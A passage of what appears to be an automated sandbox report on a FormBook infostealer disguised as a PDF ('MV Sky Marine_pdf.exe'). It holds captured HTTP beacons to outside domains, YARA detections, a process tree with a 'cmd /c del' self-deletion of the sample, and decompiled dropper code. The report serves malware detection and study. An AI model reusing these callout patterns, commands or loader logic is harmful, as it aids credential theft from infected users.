73 69 7a 65 3a 20 31 34 70 78 3b 0a 7d 0a 2e 53 54 59 4c 45 37 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 7d 0a 2e 53 54 59 4c 45 38 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 7d 0a 2d 2d 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6f 62 6a 20 3d 20 6a 51 75 65 72 79 2e 70 61 72 73 65 4a 53 4f 4e 28 64 69 73 6b 2e 75 74 69 6c 2e 56 69 65 77 53 68 61 72 65 55 74 69 6c 73 2e 76 69 65 77 53 68 61 72 65 44 61 74 61 29 3b 24 28 22 64 69 76 2e 62 6f 74 74 6f 6d 42 74 6e 42 61 72 2c 68 65 61 64 65 72 2e 73 6c 69 64 65 2d 73 68 6f 77 2d 68 65 61 64 65 72 3e 73 70 61 6e 22 29 2e 61 70 70 65 6e 64 28 27 3c 61 20 74 69 74 6c 65 3d 22 4a 41 45 bf d5 bc e4 2d c7 bf c1 a6 c7 fd b6 af 22 20 63 6c 61 73 73 3d 22 6e 65 77 2d 64 62 74 6e 22 20 68 69 64 65 66 6f 63 75 73 3d 22 74 72 75 65 22 20 68 72 65 66 3d 22 2f 6d 32 62 65 2f 27 2b 6f 62 6a 2e 64 6c 69 6e 6b 2b 27 22 20 64 6f 77 6e 6c 6f 61 64 3e 3c 65 6d 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 22 3e 3c 2f 65 6d 3e 3c 62 3e d6 b1 bd d3 cf c2 d4 d8 3c 2f 62 3e 3c 2f 61 3e 27 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 20 6a 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                                                                                                Data Ascii: 2000<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">... saved from url=(0034)http://www.botouyoubeng.com/ertert --><html><head><meta http-equiv="Content-Type" content="text/html; charset=gbk"><title></title><meta http-equiv="Refresh" content="5; url=/default.html"><meta content="MSHTML 6.00.2900.3640" name="GENERATOR"><style type="text/css">....STYLE1 {font-size: 24px;font-weight: bold;}.STYLE6 {color: #000000;font-size: 14px;}.STYLE7 {font-size: 18px}.STYLE8 {font-size: 15px}--></style><script type="text/javascript">var obj = jQuery.parseJSON(disk.util.ViewShareUtils.viewShareData);$("div.bottomBtnBar,header.slide-show-header>span").append('<a title="JAE-" class="new-dbtn" hidefocus="true" href="/m2be/'+obj.dlink+'" download><em class="icon-download"></em><b></b></a>')</script><script type="text/javascript" src=" js.js"></script></head><bo
                                                                                                Mar 22, 2021 08:56:27.880964994 CET5011INData Raw: 64 79 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 76 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 61 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22
                                                                                                Data Ascii: dy text="#000000" vlink="#cc3300" alink="#cc3300" link="#cc3300" bgcolor="#ffffff" leftmargin="0" topmargin="0" marginheight="0" marginwidth="0"><div align="center"><table bordercolor="#dfdfdf" cellspacing="2" cellpadding="10" width="100%" b
                                                                                                Mar 22, 2021 08:56:27.880980968 CET5012INData Raw: 31 36 3b 26 23 32 35 32 33 37 3b 26 23 32 37 38 38 30 3b a3 a1 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 63 6c 61 73 73 3d 22 73 39 70 22 3e
                                                                                                Data Ascii: 16;&#25237;&#27880;</span></p></td></tr> <tr> <td class="s9p">&nbsp;</td> <td class="s9p"> <p></p></td></tr> <tr> <td class="s9p">&nbsp;</td> <td class="s9p">&nbsp;&nbsp;&nb
                                                                                                Mar 22, 2021 08:56:27.881000042 CET5014INData Raw: 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e
                                                                                                Data Ascii: static.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script><div clas
                                                                                                Mar 22, 2021 08:56:27.881017923 CET5015INData Raw: 6d 65 70 72 65 22 3e 3c 70 20 69 64 3d 22 70 6c 5f 74 69 6d 65 70 22 3e 3c 73 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f
                                                                                                Data Ascii: mepre"><p id="pl_timep"><span id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr
                                                                                                Mar 22, 2021 08:56:27.881082058 CET5016INData Raw: 22 70 6c 5f 74 69 6d 65 70 22 3e 3c 73 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73
                                                                                                Data Ascii: "pl_timep"><span id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre
                                                                                                Mar 22, 2021 08:56:27.881242990 CET5018INData Raw: 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22
                                                                                                Data Ascii: pan id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepr
                                                                                                Mar 22, 2021 08:56:27.881259918 CET5019INData Raw: 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72
                                                                                                Data Ascii: d="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p
                                                                                                Mar 22, 2021 08:56:27.881278992 CET5021INData Raw: 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72 65 3e 3c 74 68 3e 3c 2f 74 68 3e 3c 74
                                                                                                Data Ascii: "></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p id="pl_timep
                                                                                                Mar 22, 2021 08:56:27.882625103 CET5022INData Raw: 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72 65 3e 3c 74 68 3e 3c 2f 74 68 3e 3c 74 72 20 63 6c 61 73 73 3d 22 74 69 6d 65
                                                                                                Data Ascii: </pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p id="pl_timep"><span id="p


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                7192.168.2.549734192.0.78.2580C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:42.087268114 CET5090OUTGET /m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.michaelroberts.gallery
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:42.128125906 CET5091INHTTP/1.1 301 Moved Permanently
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 07:56:42 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 162
                                                                                                Connection: close
                                                                                                Location: https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW
                                                                                                X-ac: 2.hhn _dca
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                8192.168.2.549735206.189.174.2980C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:47.493304014 CET5092OUTGET /m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.antiracismbyu.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:48.593951941 CET5092INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 22 Mar 2021 07:56:47 GMT
                                                                                                Server: Apache
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Upgrade: h2,h2c
                                                                                                Connection: Upgrade, close
                                                                                                Location: http://antiracismbyu.com/m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW
                                                                                                Transfer-Encoding: chunked
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Mar 22, 2021 08:56:48.603634119 CET5092INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                Analysis Process: MV Sky Marine_pdf.exe PID: 5580 Parent PID: 5608

                                                                                                General

                                                                                                Start time:08:54:43
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Users\user\Desktop\MV Sky Marine_pdf.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
                                                                                                Imagebase:0x400000
                                                                                                File size:211985 bytes
                                                                                                MD5 hash:9558601F64F4D03A49BF20B3C0186AF0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:low

                                                                                                Chronological Activities

                                                                                                Analysis Process: MV Sky Marine_pdf.exe PID: 5476 Parent PID: 5580

                                                                                                General

                                                                                                Start time:08:54:44
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Users\user\Desktop\MV Sky Marine_pdf.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
                                                                                                Imagebase:0x400000
                                                                                                File size:211985 bytes
                                                                                                MD5 hash:9558601F64F4D03A49BF20B3C0186AF0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:low

                                                                                                Chronological Activities

                                                                                                Analysis Process: explorer.exe PID: 3472 Parent PID: 5476

                                                                                                General

                                                                                                Start time:08:54:49
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff693d90000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Chronological Activities

                                                                                                Analysis Process: wlanext.exe PID: 4500 Parent PID: 3472

                                                                                                General

                                                                                                Start time:08:55:03
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:78848 bytes
                                                                                                MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:moderate

                                                                                                Chronological Activities

                                                                                                Analysis Process: cmd.exe PID: 3552 Parent PID: 4500

                                                                                                General

                                                                                                Start time:08:55:07
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:/c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
                                                                                                Imagebase:0xf10000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Chronological Activities

                                                                                                Analysis Process: conhost.exe PID: 5916 Parent PID: 3552

                                                                                                General

                                                                                                Start time:08:55:08
                                                                                                Start date:22/03/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Chronological Activities

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >

                                                                                                  Analysis Process: MV Sky Marine_pdf.exe PID: 5580 Parent PID: 5608 MV Sky Marine_pdf.exeCOMMON

                                                                                                  Executed Functions

                                                                                                  Function 0040326F, Relevance: 77.3, APIs: 26, Strings: 18, Instructions: 315stringfilecomCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 78%
                                                                                                  			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				int _t91;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E004060B4(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E00405842(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								__eflags =  &(_t56[2]);
								E00405D24(0x7a8400,  &(_t56[2]));
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E0040323E(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402CA5(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403685();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x7a2834;
											if( *0x7a2834 == 0) {
												L64:
												_t64 =  *0x7a284c;
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E004060B4(5);
											_t119 = E004060B4(6);
											_t67 = E004060B4(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E004060B4(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E004055E5( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x7a27bc == 0) {
										L36:
										 *0x7a284c =  *0x7a284c | 0xffffffff;
										 *(_t129 + 0x1c) = E00403777( *0x7a284c);
										goto L37;
									}
									_t123 = E00405842(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040556C(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E0040554F();
											} else {
												E004054D2();
											}
											SetCurrentDirectoryA(_t116);
											_t147 =  *0x7a8400; // 0x0
											if(_t147 == 0) {
												E00405D24(0x7a8400, _t127);
											}
											E00405D24(0x7a3000,  *(_t129 + 0x20));
											 *0x7a3400 = 0x41;
											_t128 = 0x1a;
											do {
												E00405D46(0, _t116, 0x79d958, 0x79d958,  *((intOrPtr*)( *0x7a27b0 + 0x120)));
												DeleteFileA(0x79d958);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x79d958, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x79d958);
														E00405A72(_t149);
														E00405D46(0, _t116, 0x79d958, 0x79d958,  *((intOrPtr*)( *0x7a27b0 + 0x124)));
														_t95 = E00405584(0x79d958);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x7a3400 =  *0x7a3400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405A72(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E004058F8(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405D24(0x7a8400, _t124);
									E00405D24(0x7a8800, _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E0040323E(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00406046(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E004060B4(0xd);
					_t47 = E004060B4(0xb);
					 *0x7a27a4 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
